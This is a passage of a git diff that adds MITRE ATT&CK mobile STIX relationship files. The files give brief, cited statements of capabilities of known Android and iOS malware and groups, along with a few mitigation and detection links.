+ "modified": "2019-09-11T13:25:19.117Z",
+ "description": " [Exodus](https://attack.mitre.org/software/S0405) Two can obtain a list of installed applications.(Citation: SWB Exodus March 2019) ",
+ "relationship_type": "uses",
+ "source_ref": "malware--3049b2f2-e323-4cdb-91cb-13b37b904cbb",
+ "target_ref": "attack-pattern--198ce408-1470-45ee-b47f-7056050d4fc2",
+ "x_mitre_version": "1.0",
+ "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5"
+ }
+ ]
+}
\ No newline at end of file
diff --git a/cti-ATT-CK-v13.1/mobile-attack/relationship/relationship--fc7639c8-0e52-4f6f-9cf3-7840be81ad55.json b/cti-ATT-CK-v13.1/mobile-attack/relationship/relationship--fc7639c8-0e52-4f6f-9cf3-7840be81ad55.json
new file mode 100644
index 0000000000000000000000000000000000000000..61a782698f8fdf0fb5542865bbf09cc4ee01d8fb
--- /dev/null
+++ b/cti-ATT-CK-v13.1/mobile-attack/relationship/relationship--fc7639c8-0e52-4f6f-9cf3-7840be81ad55.json
@@ -0,0 +1,33 @@
+{
+ "type": "bundle",
+ "id": "bundle--c722d56b-273e-45a1-9927-8db11981434b",
+ "spec_version": "2.0",
+ "objects": [
+ {
+ "type": "relationship",
+ "id": "relationship--fc7639c8-0e52-4f6f-9cf3-7840be81ad55",
+ "created": "2023-03-03T16:23:56.031Z",
+ "revoked": false,
+ "external_references": [
+ {
+ "source_name": "paloalto_yispecter_1015",
+ "description": "Claud Xiao. (2015, October 4). YiSpecter: First iOS Malware That Attacks Non-jailbroken Apple iOS Devices by Abusing Private APIs. Retrieved March 3, 2023.",
+ "url": "https://unit42.paloaltonetworks.com/yispecter-first-ios-malware-attacks-non-jailbroken-ios-devices-by-abusing-private-apis/"
+ }
+ ],
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "modified": "2023-03-03T16:23:56.031Z",
+ "description": "[YiSpecter](https://attack.mitre.org/software/S0311) has collected the device UUID.(Citation: paloalto_yispecter_1015)",
+ "relationship_type": "uses",
+ "source_ref": "malware--a15c9357-2be0-4836-beec-594f28b9b4a9",
+ "target_ref": "attack-pattern--e2ea7f6b-8d4f-49c3-819d-660530d12b77",
+ "x_mitre_deprecated": false,
+ "x_mitre_version": "0.1",
+ "x_mitre_attack_spec_version": "3.1.0",
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5"
+ }
+ ]
+}
\ No newline at end of file
diff --git a/cti-ATT-CK-v13.1/mobile-attack/relationship/relationship--fc816ddc-199d-47b0-93af-c81305d0919f.json b/cti-ATT-CK-v13.1/mobile-attack/relationship/relationship--fc816ddc-199d-47b0-93af-c81305d0919f.json
new file mode 100644
index 0000000000000000000000000000000000000000..b616821ea06d7f67fa60acb435815b84c863fbc3
--- /dev/null
+++ b/cti-ATT-CK-v13.1/mobile-attack/relationship/relationship--fc816ddc-199d-47b0-93af-c81305d0919f.json
@@ -0,0 +1,30 @@
+{
+ "type": "bundle",
+ "id": "bundle--646fe9cf-c28e-400b-b20c-763b60fbd736",
+ "spec_version": "2.0",
+ "objects": [
+ {
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "id": "relationship--fc816ddc-199d-47b0-93af-c81305d0919f",
+ "type": "relationship",
+ "created": "2020-06-02T14:32:31.767Z",
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "external_references": [
+ {
+ "source_name": "Volexity Insomnia",
+ "url": "https://www.volexity.com/blog/2020/04/21/evil-eye-threat-actor-resurfaces-with-ios-exploit-and-updated-implant/",
+ "description": "A. Case, D. Lassalle, M. Meltzer, S. Koessel, et al.. (2020, April 21). Evil Eye Threat Actor Resurfaces with iOS Exploit and Updated Implant. Retrieved June 2, 2020."
+ }
+ ],
+ "modified": "2020-06-02T14:32:31.767Z",
+ "description": "[INSOMNIA](https://attack.mitre.org/software/S0463) has utilized malicious JavaScript and iframes to exploit WebKit running on vulnerable iOS 12 devices.(Citation: Volexity Insomnia)",
+ "relationship_type": "uses",
+ "source_ref": "malware--21b7e0b0-0dea-4ccc-8ad4-8da51fe3a901",
+ "target_ref": "attack-pattern--fd339382-bfec-4bf0-8d47-1caedc9e7e57",
+ "x_mitre_version": "1.0",
+ "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5"
+ }
+ ]
+}
\ No newline at end of file
diff --git a/cti-ATT-CK-v13.1/mobile-attack/relationship/relationship--fcb3a139-f644-45c9-8123-dfea0455143a.json b/cti-ATT-CK-v13.1/mobile-attack/relationship/relationship--fcb3a139-f644-45c9-8123-dfea0455143a.json
new file mode 100644
index 0000000000000000000000000000000000000000..1cbc61bd9bdc92fa60032fb324aa6b9c70e16ea2
--- /dev/null
+++ b/cti-ATT-CK-v13.1/mobile-attack/relationship/relationship--fcb3a139-f644-45c9-8123-dfea0455143a.json
@@ -0,0 +1,30 @@
+{
+ "type": "bundle",
+ "id": "bundle--9c4855f4-cc30-457a-8d88-1cfbec5d716e",
+ "spec_version": "2.0",
+ "objects": [
+ {
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "id": "relationship--fcb3a139-f644-45c9-8123-dfea0455143a",
+ "type": "relationship",
+ "created": "2019-08-09T17:56:05.588Z",
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "external_references": [
+ {
+ "url": "https://researchcenter.paloaltonetworks.com/2017/07/unit42-spydealer-android-trojan-spying-40-apps/",
+ "description": "Wenjun Hu, Cong Zheng and Zhi Xu. (2017, July 6). SpyDealer: Android Trojan Spying on More Than 40 Apps. Retrieved September 18, 2018.",
+ "source_name": "PaloAlto-SpyDealer"
+ }
+ ],
+ "modified": "2019-08-09T17:56:05.588Z",
+ "description": "[SpyDealer](https://attack.mitre.org/software/S0324) can record video and take photos via front and rear cameras.(Citation: PaloAlto-SpyDealer)",
+ "relationship_type": "uses",
+ "source_ref": "malware--86fc6f0c-86d9-473e-89f3-f50f3cb9319b",
+ "target_ref": "attack-pattern--d8940e76-f9c1-4912-bea6-e21c251370b6",
+ "x_mitre_version": "1.0",
+ "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5"
+ }
+ ]
+}
\ No newline at end of file
diff --git a/cti-ATT-CK-v13.1/mobile-attack/relationship/relationship--fcc42341-ec3a-4e24-a374-46bed72d061f.json b/cti-ATT-CK-v13.1/mobile-attack/relationship/relationship--fcc42341-ec3a-4e24-a374-46bed72d061f.json
new file mode 100644
index 0000000000000000000000000000000000000000..25a438a4d0f5a820d5e63bcfed29643f058a8423
--- /dev/null
+++ b/cti-ATT-CK-v13.1/mobile-attack/relationship/relationship--fcc42341-ec3a-4e24-a374-46bed72d061f.json
@@ -0,0 +1,30 @@
+{
+ "type": "bundle",
+ "id": "bundle--07225759-ee55-44eb-ab69-0505166450fd",
+ "spec_version": "2.0",
+ "objects": [
+ {
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "id": "relationship--fcc42341-ec3a-4e24-a374-46bed72d061f",
+ "type": "relationship",
+ "created": "2021-10-01T14:42:49.191Z",
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "external_references": [
+ {
+ "source_name": "SecureList BusyGasper",
+ "url": "https://securelist.com/busygasper-the-unfriendly-spy/87627/",
+ "description": "Alexey Firsh. (2018, August 29). BusyGasper \u2013 the unfriendly spy. Retrieved October 1, 2021."
+ }
+ ],
+ "modified": "2021-10-01T14:42:49.191Z",
+ "description": "[BusyGasper](https://attack.mitre.org/software/S0655) can collect data from messaging applications, including WhatsApp, Viber, and Facebook.(Citation: SecureList BusyGasper)",
+ "relationship_type": "uses",
+ "source_ref": "malware--e110f94a-e2c5-4f5f-ba78-9c2ab6d2d9e4",
+ "target_ref": "attack-pattern--702055ac-4e54-4ae9-9527-e23a38e0b160",
+ "x_mitre_version": "1.0",
+ "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5"
+ }
+ ]
+}
\ No newline at end of file
diff --git a/cti-ATT-CK-v13.1/mobile-attack/relationship/relationship--fcda686d-0c3a-457a-a34d-6dcfb28f54bd.json b/cti-ATT-CK-v13.1/mobile-attack/relationship/relationship--fcda686d-0c3a-457a-a34d-6dcfb28f54bd.json
new file mode 100644
index 0000000000000000000000000000000000000000..7d73e596f976a95aca3f0161ccd00ba14724b1de
--- /dev/null
+++ b/cti-ATT-CK-v13.1/mobile-attack/relationship/relationship--fcda686d-0c3a-457a-a34d-6dcfb28f54bd.json
@@ -0,0 +1,33 @@
+{
+ "type": "bundle",
+ "id": "bundle--36ae66eb-be6c-4571-997e-cedc679ec41c",
+ "spec_version": "2.0",
+ "objects": [
+ {
+ "type": "relationship",
+ "id": "relationship--fcda686d-0c3a-457a-a34d-6dcfb28f54bd",
+ "created": "2020-06-26T14:55:13.333Z",
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "revoked": false,
+ "external_references": [
+ {
+ "source_name": "Cybereason EventBot",
+ "description": "D. Frank, L. Rochberger, Y. Rimmer, A. Dahan. (2020, April 30). EventBot: A New Mobile Banking Trojan is Born. Retrieved June 26, 2020.",
+ "url": "https://www.cybereason.com/blog/eventbot-a-new-mobile-banking-trojan-is-born"
+ }
+ ],
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "modified": "2023-04-05T17:49:38.924Z",
+ "description": "[EventBot](https://attack.mitre.org/software/S0478) registers for the `BOOT_COMPLETED` intent to auto-start after the device boots.(Citation: Cybereason EventBot)",
+ "relationship_type": "uses",
+ "source_ref": "malware--aecc0097-c9f8-4786-9b39-e891ff173f54",
+ "target_ref": "attack-pattern--3775a580-a1d1-46c4-8147-c614a715f2e9",
+ "x_mitre_deprecated": false,
+ "x_mitre_version": "1.0",
+ "x_mitre_attack_spec_version": "3.1.0",
+ "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5"
+ }
+ ]
+}
\ No newline at end of file
diff --git a/cti-ATT-CK-v13.1/mobile-attack/relationship/relationship--fcdc2f1f-9787-4faa-86bf-2ed73f15a576.json b/cti-ATT-CK-v13.1/mobile-attack/relationship/relationship--fcdc2f1f-9787-4faa-86bf-2ed73f15a576.json
new file mode 100644
index 0000000000000000000000000000000000000000..1f2862fbbd90430453832fe3f16d3b90615b7e0c
--- /dev/null
+++ b/cti-ATT-CK-v13.1/mobile-attack/relationship/relationship--fcdc2f1f-9787-4faa-86bf-2ed73f15a576.json
@@ -0,0 +1,30 @@
+{
+ "type": "bundle",
+ "id": "bundle--4ad3d8e2-7915-4041-8143-7b023003fcd3",
+ "spec_version": "2.0",
+ "objects": [
+ {
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "id": "relationship--fcdc2f1f-9787-4faa-86bf-2ed73f15a576",
+ "type": "relationship",
+ "created": "2020-09-14T14:13:45.294Z",
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "external_references": [
+ {
+ "source_name": "Lookout eSurv",
+ "url": "https://blog.lookout.com/esurv-research",
+ "description": "A. Bauer. (2019, April 8). Lookout discovers phishing sites distributing new iOS and Android surveillanceware. Retrieved September 11, 2020."
+ }
+ ],
+ "modified": "2020-09-14T15:39:17.961Z",
+ "description": "[eSurv](https://attack.mitre.org/software/S0507)\u2019s Android version is distributed in three stages: the dropper, the second stage payload, and the third stage payload which is [Exodus](https://attack.mitre.org/software/S0405).(Citation: Lookout eSurv)",
+ "relationship_type": "uses",
+ "source_ref": "malware--680f680c-eef9-4f8a-b5f5-f451bf47e403",
+ "target_ref": "attack-pattern--6c49d50f-494d-4150-b774-a655022d20a6",
+ "x_mitre_version": "1.0",
+ "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5"
+ }
+ ]
+}
\ No newline at end of file
diff --git a/cti-ATT-CK-v13.1/mobile-attack/relationship/relationship--fd5b3d4b-5d56-4d66-8b57-f858bc139901.json b/cti-ATT-CK-v13.1/mobile-attack/relationship/relationship--fd5b3d4b-5d56-4d66-8b57-f858bc139901.json
new file mode 100644
index 0000000000000000000000000000000000000000..004f37871d31088d43011b753a7cec8e745621f1
--- /dev/null
+++ b/cti-ATT-CK-v13.1/mobile-attack/relationship/relationship--fd5b3d4b-5d56-4d66-8b57-f858bc139901.json
@@ -0,0 +1,30 @@
+{
+ "type": "bundle",
+ "id": "bundle--9dee057f-dd24-4c8e-8483-c6d2649ac9ab",
+ "spec_version": "2.0",
+ "objects": [
+ {
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "id": "relationship--fd5b3d4b-5d56-4d66-8b57-f858bc139901",
+ "type": "relationship",
+ "created": "2020-04-24T17:46:31.607Z",
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "external_references": [
+ {
+ "source_name": "SecurityIntelligence TrickMo",
+ "url": "https://securityintelligence.com/posts/trickbot-pushing-a-2fa-bypass-app-to-bank-customers-in-germany/",
+ "description": "P. Asinovsky. (2020, March 24). TrickBot Pushing a 2FA Bypass App to Bank Customers in Germany. Retrieved April 24, 2020."
+ }
+ ],
+ "modified": "2020-04-24T17:46:31.607Z",
+ "description": "[TrickMo](https://attack.mitre.org/software/S0427) contains obfuscated function, class, and variable names, and encrypts its shared preferences using Java\u2019s `PBEWithMD5AndDES` algorithm.(Citation: SecurityIntelligence TrickMo)",
+ "relationship_type": "uses",
+ "source_ref": "malware--21170624-89db-4e99-bf27-58d26be07c3a",
+ "target_ref": "attack-pattern--d13fa042-8f26-44e1-a2a8-af0bf8e2ac9a",
+ "x_mitre_version": "1.0",
+ "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5"
+ }
+ ]
+}
\ No newline at end of file
diff --git a/cti-ATT-CK-v13.1/mobile-attack/relationship/relationship--fd6c7f4b-ce0f-4770-8487-786e41b63549.json b/cti-ATT-CK-v13.1/mobile-attack/relationship/relationship--fd6c7f4b-ce0f-4770-8487-786e41b63549.json
new file mode 100644
index 0000000000000000000000000000000000000000..e482b91e831b2b39e846681c3e67ddbc3ddd4572
--- /dev/null
+++ b/cti-ATT-CK-v13.1/mobile-attack/relationship/relationship--fd6c7f4b-ce0f-4770-8487-786e41b63549.json
@@ -0,0 +1,26 @@
+{
+ "type": "bundle",
+ "id": "bundle--7d605ed3-843e-4296-bbb0-459f5cbf2158",
+ "spec_version": "2.0",
+ "objects": [
+ {
+ "type": "relationship",
+ "id": "relationship--fd6c7f4b-ce0f-4770-8487-786e41b63549",
+ "created": "2023-03-20T18:24:56.396Z",
+ "revoked": false,
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "modified": "2023-03-20T18:24:56.396Z",
+ "description": "",
+ "relationship_type": "detects",
+ "source_ref": "x-mitre-data-component--85a533a4-5fa4-4dba-b45d-f0717bedd6e6",
+ "target_ref": "attack-pattern--fd339382-bfec-4bf0-8d47-1caedc9e7e57",
+ "x_mitre_deprecated": false,
+ "x_mitre_version": "0.1",
+ "x_mitre_attack_spec_version": "3.1.0",
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5"
+ }
+ ]
+}
\ No newline at end of file
diff --git a/cti-ATT-CK-v13.1/mobile-attack/relationship/relationship--fd8a4b6d-0e7b-4105-ad7b-576836be6394.json b/cti-ATT-CK-v13.1/mobile-attack/relationship/relationship--fd8a4b6d-0e7b-4105-ad7b-576836be6394.json
new file mode 100644
index 0000000000000000000000000000000000000000..70966342f8a75b11395fc059dd0fdc51c49ce9a4
--- /dev/null
+++ b/cti-ATT-CK-v13.1/mobile-attack/relationship/relationship--fd8a4b6d-0e7b-4105-ad7b-576836be6394.json
@@ -0,0 +1,33 @@
+{
+ "type": "bundle",
+ "id": "bundle--b9e4d8bb-2ee5-4328-9fdc-9783461a7e5c",
+ "spec_version": "2.0",
+ "objects": [
+ {
+ "type": "relationship",
+ "id": "relationship--fd8a4b6d-0e7b-4105-ad7b-576836be6394",
+ "created": "2021-02-08T16:36:20.639Z",
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "revoked": false,
+ "external_references": [
+ {
+ "source_name": "BlackBerry Bahamut",
+ "description": "The BlackBerry Research & Intelligence Team. (2020, October). BAHAMUT: Hack-for-Hire Masters of Phishing, Fake News, and Fake Apps. Retrieved February 8, 2021.",
+ "url": "https://www.blackberry.com/us/en/pdfviewer?file=/content/dam/blackberry-com/asset/enterprise/pdf/direct/report-spark-bahamut.pdf"
+ }
+ ],
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "modified": "2023-04-05T17:07:15.780Z",
+ "description": "[Windshift](https://attack.mitre.org/groups/G0112) has region-locked their malicious applications during their Operation BULL campaign.(Citation: BlackBerry Bahamut)",
+ "relationship_type": "uses",
+ "source_ref": "intrusion-set--afec6dc3-a18e-4b62-b1a4-5510e1a498d1",
+ "target_ref": "attack-pattern--e422b6fa-4739-46b9-992e-82f1b350c780",
+ "x_mitre_deprecated": false,
+ "x_mitre_version": "1.0",
+ "x_mitre_attack_spec_version": "3.1.0",
+ "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5"
+ }
+ ]
+}
\ No newline at end of file
diff --git a/cti-ATT-CK-v13.1/mobile-attack/relationship/relationship--fda8fe32-6121-4b81-9aa0-4e9596db88b1.json b/cti-ATT-CK-v13.1/mobile-attack/relationship/relationship--fda8fe32-6121-4b81-9aa0-4e9596db88b1.json
new file mode 100644
index 0000000000000000000000000000000000000000..94c5f7c907511bd185a30c03c5f0f9efd5c4f52f
--- /dev/null
+++ b/cti-ATT-CK-v13.1/mobile-attack/relationship/relationship--fda8fe32-6121-4b81-9aa0-4e9596db88b1.json
@@ -0,0 +1,33 @@
+{
+ "type": "bundle",
+ "id": "bundle--387e50ff-a8cc-417e-bfa4-2eed928d8518",
+ "spec_version": "2.0",
+ "objects": [
+ {
+ "type": "relationship",
+ "id": "relationship--fda8fe32-6121-4b81-9aa0-4e9596db88b1",
+ "created": "2020-07-15T20:20:59.227Z",
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "revoked": false,
+ "external_references": [
+ {
+ "source_name": "Bitdefender Mandrake",
+ "description": "R. Gevers, M. Tivadar, R. Bleotu, A. M. Barbatei, et al.. (2020, May 14). Uprooting Mandrake: The Story of an Advanced Android Spyware Framework That Went Undetected for 4 Years. Retrieved July 15, 2020.",
+ "url": "https://www.bitdefender.com/files/News/CaseStudies/study/329/Bitdefender-PR-Whitepaper-Mandrake-creat4464-en-EN-interactive.pdf"
+ }
+ ],
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "modified": "2023-04-05T20:33:57.748Z",
+ "description": "[Mandrake](https://attack.mitre.org/software/S0485) can access SMS messages.(Citation: Bitdefender Mandrake)",
+ "relationship_type": "uses",
+ "source_ref": "malware--52c994fa-b6c8-45a8-9586-a4275cf19307",
+ "target_ref": "attack-pattern--c6421411-ae61-42bb-9098-73fddb315002",
+ "x_mitre_deprecated": false,
+ "x_mitre_version": "1.0",
+ "x_mitre_attack_spec_version": "3.1.0",
+ "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5"
+ }
+ ]
+}
\ No newline at end of file
diff --git a/cti-ATT-CK-v13.1/mobile-attack/relationship/relationship--fdf06a0b-08d2-4cac-9d49-b3f1454ec4ea.json b/cti-ATT-CK-v13.1/mobile-attack/relationship/relationship--fdf06a0b-08d2-4cac-9d49-b3f1454ec4ea.json
new file mode 100644
index 0000000000000000000000000000000000000000..db3f793326041ebc513c35773ea8f2322c1308c1
--- /dev/null
+++ b/cti-ATT-CK-v13.1/mobile-attack/relationship/relationship--fdf06a0b-08d2-4cac-9d49-b3f1454ec4ea.json
@@ -0,0 +1,26 @@
+{
+ "type": "bundle",
+ "id": "bundle--1daac5d2-3700-4242-919e-2b744baeed8b",
+ "spec_version": "2.0",
+ "objects": [
+ {
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "type": "relationship",
+ "id": "relationship--fdf06a0b-08d2-4cac-9d49-b3f1454ec4ea",
+ "created": "2022-03-30T19:32:43.015Z",
+ "x_mitre_version": "0.1",
+ "x_mitre_deprecated": false,
+ "revoked": false,
+ "description": "Attestation can detect rooted devices. Mobile security software can then use this information and take appropriate mitigation action. Attestation can detect rooted devices.",
+ "modified": "2022-03-30T19:32:43.015Z",
+ "relationship_type": "mitigates",
+ "source_ref": "course-of-action--ff4821f6-5afb-481b-8c0f-26c28c0d666c",
+ "target_ref": "attack-pattern--0cdd66ad-26ac-4338-a764-4972a1e17ee3",
+ "x_mitre_attack_spec_version": "2.1.0",
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5"
+ }
+ ]
+}
\ No newline at end of file
diff --git a/cti-ATT-CK-v13.1/mobile-attack/relationship/relationship--fe794ba6-42be-4d42-a16f-a41473874331.json b/cti-ATT-CK-v13.1/mobile-attack/relationship/relationship--fe794ba6-42be-4d42-a16f-a41473874331.json
new file mode 100644
index 0000000000000000000000000000000000000000..8a999e98a5e76c55ecbcccf999e7e9ec48fde0dc
--- /dev/null
+++ b/cti-ATT-CK-v13.1/mobile-attack/relationship/relationship--fe794ba6-42be-4d42-a16f-a41473874331.json
@@ -0,0 +1,33 @@
+{
+ "type": "bundle",
+ "id": "bundle--ea7ab4c0-ff62-490d-9cba-8a7143b50946",
+ "spec_version": "2.0",
+ "objects": [
+ {
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "type": "relationship",
+ "id": "relationship--fe794ba6-42be-4d42-a16f-a41473874331",
+ "created": "2022-03-30T15:08:13.679Z",
+ "x_mitre_version": "0.1",
+ "external_references": [
+ {
+ "source_name": "Android-VerifiedBoot",
+ "url": "https://source.android.com/security/verifiedboot/",
+ "description": "Android. (n.d.). Verified Boot. Retrieved December 21, 2016."
+ }
+ ],
+ "x_mitre_deprecated": false,
+ "revoked": false,
+ "description": "Android Verified Boot can detect unauthorized modifications made to the system partition, which could lead to execution flow hijacking.(Citation: Android-VerifiedBoot) ",
+ "modified": "2022-03-30T15:08:13.679Z",
+ "relationship_type": "mitigates",
+ "source_ref": "course-of-action--7b1cf46f-784b-405a-a8dd-4624c19d8321",
+ "target_ref": "attack-pattern--c6e17ca2-08b5-4379-9786-89bd05241831",
+ "x_mitre_attack_spec_version": "2.1.0",
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5"
+ }
+ ]
+}
\ No newline at end of file
diff --git a/cti-ATT-CK-v13.1/mobile-attack/relationship/relationship--ff3aa49b-c054-44ec-89da-6c67d4995193.json b/cti-ATT-CK-v13.1/mobile-attack/relationship/relationship--ff3aa49b-c054-44ec-89da-6c67d4995193.json
new file mode 100644
index 0000000000000000000000000000000000000000..6abfb5fb5410f5ea0900655f57314ac602d7ed76
--- /dev/null
+++ b/cti-ATT-CK-v13.1/mobile-attack/relationship/relationship--ff3aa49b-c054-44ec-89da-6c67d4995193.json
@@ -0,0 +1,26 @@
+{
+ "type": "bundle",
+ "id": "bundle--d2aea618-a9e3-4c86-9613-8ce2762050e6",
+ "spec_version": "2.0",
+ "objects": [
+ {
+ "type": "relationship",
+ "id": "relationship--ff3aa49b-c054-44ec-89da-6c67d4995193",
+ "created": "2023-03-20T18:44:44.257Z",
+ "revoked": false,
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "modified": "2023-03-20T18:44:44.257Z",
+ "description": "",
+ "relationship_type": "detects",
+ "source_ref": "x-mitre-data-component--b1e0bb80-23d4-44f2-b919-7e9c54898f43",
+ "target_ref": "attack-pattern--a8c31121-852b-46bd-9ba4-674ae5afe7ad",
+ "x_mitre_deprecated": false,
+ "x_mitre_version": "0.1",
+ "x_mitre_attack_spec_version": "3.1.0",
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5"
+ }
+ ]
+}
\ No newline at end of file
diff --git a/cti-ATT-CK-v13.1/mobile-attack/relationship/relationship--ffc24804-42db-4be1-a418-7f5ab9de453c.json b/cti-ATT-CK-v13.1/mobile-attack/relationship/relationship--ffc24804-42db-4be1-a418-7f5ab9de453c.json
new file mode 100644
index 0000000000000000000000000000000000000000..d1bbc4e50f95189aed7856fc98cbcd0dc3abf41b
--- /dev/null
+++ b/cti-ATT-CK-v13.1/mobile-attack/relationship/relationship--ffc24804-42db-4be1-a418-7f5ab9de453c.json
@@ -0,0 +1,30 @@
+{
+ "type": "bundle",
+ "id": "bundle--e80f9bcb-1e25-472c-a73d-158a51f95f76",
+ "spec_version": "2.0",
+ "objects": [
+ {
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "id": "relationship--ffc24804-42db-4be1-a418-7f5ab9de453c",
+ "type": "relationship",
+ "created": "2017-12-14T16:46:06.044Z",
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "external_references": [
+ {
+ "source_name": "Lookout-NotCompatible",
+ "description": "Tim Strazzere. (2014, November 19). The new NotCompatible: Sophisticated and evasive threat harbors the potential to compromise enterprise networks. Retrieved December 22, 2016.",
+ "url": "https://blog.lookout.com/blog/2014/11/19/notcompatible/"
+ }
+ ],
+ "modified": "2018-10-17T00:14:20.652Z",
+ "description": "[NotCompatible](https://attack.mitre.org/software/S0299) has the capability to exploit systems on an enterprise network.(Citation: Lookout-NotCompatible)",
+ "relationship_type": "uses",
+ "source_ref": "malware--23040c15-e7d8-47b5-8c16-8fd3e0e297fe",
+ "target_ref": "attack-pattern--22379609-a99f-4a01-bd7e-70f3e105859d",
+ "x_mitre_version": "1.0",
+ "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5"
+ }
+ ]
+}
\ No newline at end of file
diff --git a/cti-ATT-CK-v13.1/mobile-attack/relationship/relationship--ffc82546-f4da-4f47-88ec-b215edb1d695.json b/cti-ATT-CK-v13.1/mobile-attack/relationship/relationship--ffc82546-f4da-4f47-88ec-b215edb1d695.json
new file mode 100644
index 0000000000000000000000000000000000000000..7321c385937733becaee349c1c4bdd31f78b2a3c
--- /dev/null
+++ b/cti-ATT-CK-v13.1/mobile-attack/relationship/relationship--ffc82546-f4da-4f47-88ec-b215edb1d695.json
@@ -0,0 +1,30 @@
+{
+ "type": "bundle",
+ "id": "bundle--0f30608c-d7e5-4e13-89e6-8f37dff9cb2c",
+ "spec_version": "2.0",
+ "objects": [
+ {
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "id": "relationship--ffc82546-f4da-4f47-88ec-b215edb1d695",
+ "type": "relationship",
+ "created": "2021-02-08T16:36:20.799Z",
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "external_references": [
+ {
+ "source_name": "BlackBerry Bahamut",
+ "url": "https://www.blackberry.com/us/en/pdfviewer?file=/content/dam/blackberry-com/asset/enterprise/pdf/direct/report-spark-bahamut.pdf",
+ "description": "The BlackBerry Research & Intelligence Team. (2020, October). BAHAMUT: Hack-for-Hire Masters of Phishing, Fake News, and Fake Apps. Retrieved February 8, 2021."
+ }
+ ],
+ "modified": "2021-05-24T13:16:56.589Z",
+ "description": "[Windshift](https://attack.mitre.org/groups/G0112) has included malware functionality capable of downloading new DEX files at runtime during Operation BULL.(Citation: BlackBerry Bahamut)",
+ "relationship_type": "uses",
+ "source_ref": "intrusion-set--afec6dc3-a18e-4b62-b1a4-5510e1a498d1",
+ "target_ref": "attack-pattern--6c49d50f-494d-4150-b774-a655022d20a6",
+ "x_mitre_version": "1.0",
+ "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5"
+ }
+ ]
+}
\ No newline at end of file
diff --git a/cti-ATT-CK-v13.1/mobile-attack/relationship/relationship--ffddcabb-0f03-46ae-abd6-7ab94e91b055.json b/cti-ATT-CK-v13.1/mobile-attack/relationship/relationship--ffddcabb-0f03-46ae-abd6-7ab94e91b055.json
new file mode 100644
index 0000000000000000000000000000000000000000..b6336579389096a0866b5bf28484ab919d1bc40d
--- /dev/null
+++ b/cti-ATT-CK-v13.1/mobile-attack/relationship/relationship--ffddcabb-0f03-46ae-abd6-7ab94e91b055.json
